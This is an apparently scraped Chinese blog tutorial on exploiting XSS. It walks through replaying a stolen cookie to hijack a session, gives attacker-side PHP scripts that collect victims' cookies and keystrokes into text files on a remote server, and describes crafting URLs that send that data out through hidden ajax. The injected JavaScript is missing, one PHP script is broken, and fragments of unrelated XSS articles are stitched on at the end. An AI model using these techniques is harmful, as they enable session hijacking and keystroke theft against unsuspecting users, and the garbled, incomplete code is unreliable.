xss漏洞之 漏洞利用

2021-10-03 12:04:07 字數 1777 閱讀 9370

原理

網頁被植入網頁被植入xss指令碼,普通使用者訪問此網頁時,會自動將使用者本地的cookie快取傳送到指定遠端伺服器

利用

(1)首先登陸乙個頁面,抓包獲取cookie

(2)複製此頁面裡任一選項的url,重啟瀏覽器後直接訪問此url,抓包修改cookie為上面獲取的登陸成功後的cookie

(3)頁面登陸成功,無需密碼

(1)在我們自己的遠端伺服器建立乙個接收cookie的檔案1.php,1.php接受cookie後,將cookie寫入到1.txt儲存

**

<?php $file=fopen("1.txt","a"); if($_get['cookie']) ?>

(2)構造url,使開啟此url的使用者傳送本地cookie給遠端伺服器

(2.1)直接將**拼接到url,將cookie值改為獲取本地cookie,並執行

**:

效果:開啟此url的使用者跳轉到如下介面,並將本地cookie傳送到遠端伺服器,寫入遠端伺服器的1.txt中

(2.2)直接拼接url訪問時會跳轉頁面,可將**寫入乙個標籤裡在再拼接到url

(1)在我們自己的遠端伺服器建立乙個接收使用者按鍵記錄的檔案keylog.php,keylog.php接收鍵盤記錄後,將鍵盤記錄寫入到keylog.txt儲存

**:

<?php 

header("access-control-allow-credentials: true");

header("access-control-allow-origin: 192.168.0.106");

header("access-control-request-methods:get, post, put, delete, options");

header('access-control-allow-headers:x-requested-with,content-type,test-token,test-sessid');

$file=fopen("keylog.txt","a");

$_request['keylog'];

$key=$_request['keylog'];

fputs($file,$key);

?>

(2)構造url,使開啟此url的使用者傳送所有的鍵盤記錄給我們的遠端伺服器(通過ajax,隱蔽)

**:

效果:

XSS漏洞分析

網頁 客戶端 傳送請求時隱藏可自動執行的指令碼,從而使指令碼跨站執行 cross site scripeting 達到攻擊目的。由於縮寫和css衝突,故使用xss。伺服器介面 http ip port test?name aaa hobby bbb伺服器大致處理過程 string param1 re...

XSS漏洞筆記

0x01xss跨站指令碼攻擊簡介 xss漏洞是攻擊者在web頁面插入惡意的script 當使用者瀏覽該頁面時,嵌入其中web裡面的script 會被執行,從而達到惡意攻擊使用者的特殊目的。反射型xss只是簡單的把使用者輸入的資料 反射 給瀏覽器.也就是說需要誘使使用者 點選 乙個惡意鏈結,才能攻擊成...

XSS漏洞演示

1 儲存型xss 簡介 注入的惡意指令碼永久儲存在 web 應用程式的資料庫伺服器中,因此這種攻擊不需要對使用者執行任何網路釣魚技術。過程 1 構造惡意指令碼,寫入資料庫 2 客戶訪問 返回惡意資料 遇到問題 不能解析admin資料夾裡面的html檔案,沒有找到解決辦法,於是將html字尾改成了ph...